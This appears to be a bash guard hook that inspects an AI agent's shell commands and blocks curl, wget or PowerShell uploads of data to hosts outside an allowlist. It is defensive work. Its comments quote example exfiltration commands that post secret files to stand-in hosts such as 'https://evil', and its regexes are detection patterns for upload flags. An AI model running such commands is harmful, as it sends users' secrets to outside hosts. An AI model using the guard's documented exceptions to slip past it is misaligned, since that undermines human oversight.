#!/usr/bin/env bash
# Generated by Chock. Best-effort guard against exfiltration through the tool channel:
# a network command that UPLOADS data (POST/PUT/form/file) to a host outside the allowlist.
# This is a tool-time floor, NOT a network sandbox -- it stops the obvious `curl -d @secrets
# https://unknown` reflex; determined-adversary containment needs real sandboxing.
set -eu

# The allowlist is the whole policy: hosts your stack legitimately uploads to. Defaults cover
# package registries and code hosting; add your org's own domains. A host matches if it EQUALS
# an entry or ends with ".<entry>" (so api.github.com matches github.com).
ALLOWED_HOSTS="
github.com githubusercontent.com
pypi.org pythonhosted.org
npmjs.org yarnpkg.com
crates.io rubygems.org
golang.org pkg.go.dev
ghcr.io docker.io hub.docker.com quay.io
dl.google.com storage.googleapis.com
localhost 127.0.0.1
"

raw="${CHOCK_RAW_COMMAND-}"
if [ -z "$raw" ]; then
    raw="$*"
fi
[ -z "$raw" ] && exit 0

# A command whose whole job is to PRINT the pattern (documentation, an echo, a comment) is
# not executing it. Skip when the first word is a printer/comment -- but ONLY for a simple
# command. A compound command (echo ok; curl -d @secret https://evil) can hide an upload in
# a later segment, so if a separator is present we do NOT trust the first word and inspect.
first="$(printf '%s' "$raw" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]].*//')"
case "$raw" in
    *[\;\&\|]* | *$'\n'*) : ;;  # compound (separator or newline) -> inspect, do not skip
    *)
        case "$first" in
            echo | printf | print | : | \#*) exit 0 ;;
        esac
        ;;
esac

# A human-approved exception says so on the line, visibly.
case "$raw" in
    *"pragma: allowlist egress"*) exit 0 ;;
esac

shopt -s nocasematch 2>/dev/null || true

# Which network client is present? No client -> nothing to guard. We distinguish the curl/wget
# family from the PowerShell family because their upload flags are matched differently: curl
# short flags are case-sensitive single letters, while PowerShell parameters are case-insensitive
# words. Scoping each flag set to its own client is what stops a PowerShell `-TimeoutSec`/`-Title`
# from reading as a curl `-T` upload (and vice versa).
curl_re='(^|[[:space:];|&(<])([^[:space:];|&(<]*[/\])?(curl|wget)(\.exe)?([[:space:]]|$)'
curl_only_re='(^|[[:space:];|&(<])([^[:space:];|&(<]*[/\])?curl(\.exe)?([[:space:]]|$)'
ps_re='(^|[[:space:];|&(<])(iwr|invoke-webrequest|invoke-restmethod|irm)([[:space:]]|$)'
have_curl=0;     [[ "$raw" =~ $curl_re ]]      && have_curl=1
have_curl_bin=0; [[ "$raw" =~ $curl_only_re ]] && have_curl_bin=1
have_ps=0;       [[ "$raw" =~ $ps_re ]]        && have_ps=1
if [ "$have_curl" -eq 0 ] && [ "$have_ps" -eq 0 ]; then
    shopt -u nocasematch 2>/dev/null || true
    exit 0
fi

# Upload intent -- the thing that turns a fetch into an exfiltration. Fetch-only (a bare GET)
# is left alone: the target is upload/POST to an unapproved host, not normal dependency traffic.
#   curl:  -d/--data*/-F/--form*/-T/--upload-file, -X|--request POST|PUT|PATCH -- incl. attached
#          values, whether bare (-d@file), quoted (-d"$x", -d'@f'), or a spaced operand (-d @f),
#          and stdin uploads (-T-). curl short flags are CASE-SENSITIVE (-d != -D dump-header,
#          -F != -f fail, -T != -t), so this half is matched with nocasematch OFF. A short flag
#          followed by any character is treated as carrying a value; the host allowlist decides.
#   wget:  --post-data/--post-file/--body-data/--body-file/--method= POST|PUT
#   PS:    -Method POST|PUT|PATCH, -Body, -InFile, -Form -- PowerShell is case-insensitive.
# Long options are anchored to a token boundary (start or whitespace) and end on a valid boundary
# (space, =, - for the -raw/-binary/-string/-file variants, or end of line) so an option name
# cannot match inside a larger token. Both spaced (--data x) and attached (--data=x) forms count.
posix_upload_re='(^|[[:space:]])(-[dFT]([[:space:]]|[!-~])|--data([[:space:]=]|-)|--form([[:space:]=]|-)|--upload-file([[:space:]=]|$)|--post-data([[:space:]=]|$)|--post-file([[:space:]=]|$)|--body-data([[:space:]=]|$)|--body-file([[:space:]=]|$)|--json([[:space:]=]|$)|(-X[[:space:]]*|--request[[:space:]=]+)(POST|PUT|PATCH)|--method[[:space:]=]+(POST|PUT|PATCH))'
# PowerShell binds a parameter value with either whitespace or a colon (-Method:POST, -Body:$x).
ps_upload_re='(-Method[[:space:]:]+(POST|PUT|PATCH)|-Body([[:space:]:]|$)|-InFile([[:space:]:]|$)|-Form([[:space:]:]|$))'

# curl reads its URL and data from a -K/--config file this guard cannot see, so the request's
# destination is hidden from the diff -- exactly the visibility this policy exists to preserve.
# Treat it as opaque egress: block up front (case-sensitive; -K is config, -k is --insecure). Scoped
# to curl only -- wget's -K is --backup-converted, a fetch, and wget has no --config in this sense.
if [ "$have_curl_bin" -eq 1 ]; then
    shopt -u nocasematch 2>/dev/null || true
    if [[ "$raw" =~ (^|[[:space:]])(-K[[:space:]]*[^[:space:]]|--config([[:space:]=])) ]]; then
        echo "BLOCKED: 'curl -K/--config' reads the request URL and data from a file this guard cannot inspect, so the upload destination is not visible on the line. Inline the request, or mark a reviewed exception with 'pragma: allowlist egress' on the line." >&2
        exit 1
    fi
fi

uploads=0
# curl/wget half: nocasematch OFF so -d != -D, -F != -f, -T != -t (a fetch flag is not an upload).
if [ "$have_curl" -eq 1 ]; then
    shopt -u nocasematch 2>/dev/null || true
    [[ "$raw" =~ $posix_upload_re ]] && uploads=1
fi
# PowerShell half: nocasematch ON (the shell and its parameters are case-insensitive).
if [ "$uploads" -eq 0 ] && [ "$have_ps" -eq 1 ]; then
    shopt -s nocasematch 2>/dev/null || true
    [[ "$raw" =~ $ps_upload_re ]] && uploads=1
fi
if [ "$uploads" -eq 0 ]; then
    shopt -u nocasematch 2>/dev/null || true
    exit 0
fi
# nocasematch ON from here so host comparison is case-insensitive.
shopt -s nocasematch 2>/dev/null || true

_host_allowed() {
    local host="$1" a
    for a in $ALLOWED_HOSTS; do
        [[ "$host" == "$a" || "$host" == *".$a" ]] && return 0
    done
    return 1
}

# Every http(s) URL target in the command. An upload to any host NOT on the allowlist blocks.
# strip credentials (user:pass@) and any :port before matching the host.
bad_host=""
while read -r url; do
    [ -z "$url" ] && continue
    host="${url#*://}"
    host="${host%%/*}"
    host="${host##*@}"
    host="${host%%:*}"
    [ -z "$host" ] && continue
    if ! _host_allowed "$host"; then
        bad_host="$host"
        break
    fi
done < <(printf '%s\n' "$raw" | grep -oiE 'https?://[^[:space:]"'"'"'()<>]+' || true)

shopt -u nocasematch 2>/dev/null || true

if [ -n "$bad_host" ]; then
    echo "BLOCKED: uploading data to '$bad_host' is outside the egress allowlist. Send it only to an approved host, or add the host to ALLOWED_HOSTS, or mark a reviewed exception with 'pragma: allowlist egress' on the line." >&2
    exit 1
fi

exit 0
